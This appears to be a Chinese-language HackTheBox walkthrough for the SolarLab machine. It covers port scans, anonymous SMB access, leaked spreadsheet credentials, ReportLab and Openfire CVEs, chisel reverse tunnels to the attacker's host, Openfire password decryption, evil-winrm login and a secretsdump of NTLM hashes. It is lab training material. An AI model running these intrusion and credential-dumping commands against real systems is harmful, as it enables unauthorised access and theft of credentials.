SolarLab - HackTheBox

基本信息

• https://app.hackthebox.com/machines/SolarLab
• 10.10.11.16

端口扫描

80和一些常规windows端口,需要全端口扫描，还有个6791端口：

$ nmap -sC -sV 10.10.11.16
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-13 13:37 CST
Nmap scan report for 10.10.11.16
Host is up (0.087s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
80/tcp  open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: -5m08s
| smb2-time:
|   date: 2024-05-13T05:33:39
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.17 seconds

sudo rustscan -a 10.10.11.16

Open 10.10.11.16:80
Open 10.10.11.16:135
Open 10.10.11.16:139
Open 10.10.11.16:445
Open 10.10.11.16:6791

$ nmap -sC -sV -p6791 10.10.11.16
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-13 14:04 CST
Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (0.23s latency).

PORT     STATE SERVICE VERSION
6791/tcp open  http    nginx 1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
|_http-server-header: nginx/1.24.0

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.69 seconds

80

需要加hosts：

10.10.11.16 solarlab.htb

一个官网：

6791

6791是report子域名,ReportHub：

SMB

smb匿名登录，可以获取到一些文件：

下载到本地查看分析,其中xlsx中有一些账号密码：

Username	Password
Alexander.knight@gmail.com	al;ksdhfewoiuh
KAlexander	dkjafblkjadsfgl
Alexander.knight@gmail.com	d398sadsknr390
blake.byte	ThisCanB3typedeasily1@
AlexanderK	danenacia9234n
ClaudiaS	dadsfawe9dafkn

ReportHub

其中blake.byte可以登录6791的ReportHub，只是用户名需要根据表格中其他用户名变形一下：

BlakeB	ThisCanB3typedeasily1@

随意测试功能，提交一些申请生成pdf,exif信息中可以看到使用PDF Library：

CVE-2023-33733

搜索可以发现ReportLab相关漏洞：

• Ethical Hacking - CVE-2023-33733: RCE in Reportlab’s HTML Parser
  https://ethicalhacking.uk/cve-2023-33733-rce-in-reportlabs-html-parser/#gsc.tab=0
• BB-Writeups/2023/CVE-2023-33733-rce-via-htmli-in-reportlab.md at main · Sudistark/BB-Writeups
  https://github.com/Sudistark/BB-Writeups/blob/main/2023/CVE-2023-33733-rce-via-htmli-in-reportlab.md
• c53elyas/CVE-2023-33733: CVE-2023-33733 reportlab RCE
  https://github.com/c53elyas/CVE-2023-33733

其他字段有300字符限制，training_request没有，手动根据漏洞文章构造poc发送请求，打到blake：

user flag

blake用户桌面：

信息

查看端口可以发现本地的9090和9091，转发出来访问：

# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse

# target
.\chisel.exe client 10.10.14.8:9999 R:9095:127.0.0.1:9090 R:9096:127.0.0.1:9091

是openfire 4.7.4：

openfire

openfire这个漏洞,之前的Jab也出现过：

• tangxiaofeng7/CVE-2023-32315-Openfire-Bypass: rce
  https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass

用这个漏洞添加管理员登录进去：

然后就是同样的上传插件,运行命令：

openfire.script

然后获取openfire shell，翻文件发现初始数据库脚本，其中得到一些信息：

PS C:\Program Files\Openfire\embedded-db> type openfire.script

CREATE USER SA PASSWORD DIGEST 'd41d8cd98f00b204e9800998ecf8427e'
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)

openfire_decrypt

然后就可以使用这个解出openfire admin密码：

$ java OpenFireDecryptPass becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)

提权 & root flag

Openfire admin密码就是主机Administrator密码，直接登录即可：

.\chisel.exe client 10.10.14.8:9999 R:5985:127.0.0.1:5985

evil-winrm -i 127.0.0.1 -u Administrator -p 'ThisPasswordShouldDo!@'

hashdump

python3 ./examples/secretsdump.py Administrator:'ThisPasswordShouldDo!@'@10.10.11.16

Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c032ae85d6995c0bb4999ec869d90cf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:57da9863751e0fd175f042bc41aec9b2:::
blake:1000:aad3b435b51404eeaad3b435b51404ee:4cf570cdca082077b0e61addac8b7705:::
openfire:1001:aad3b435b51404eeaad3b435b51404ee:a22c1b83fa00c6030969caf37a5e061b:::

参考资料

• Ethical Hacking - CVE-2023-33733: RCE in Reportlab’s HTML Parser
  https://ethicalhacking.uk/cve-2023-33733-rce-in-reportlabs-html-parser/#gsc.tab=0
• BB-Writeups/2023/CVE-2023-33733-rce-via-htmli-in-reportlab.md at main · Sudistark/BB-Writeups
  https://github.com/Sudistark/BB-Writeups/blob/main/2023/CVE-2023-33733-rce-via-htmli-in-reportlab.md
• c53elyas/CVE-2023-33733: CVE-2023-33733 reportlab RCE
  https://github.com/c53elyas/CVE-2023-33733
• tangxiaofeng7/CVE-2023-32315-Openfire-Bypass: rce
  https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass
• c0rdis/openfire_decrypt: Little java tool to decrypt passwords from Openfire embedded-db
  https://github.com/c0rdis/openfire_decrypt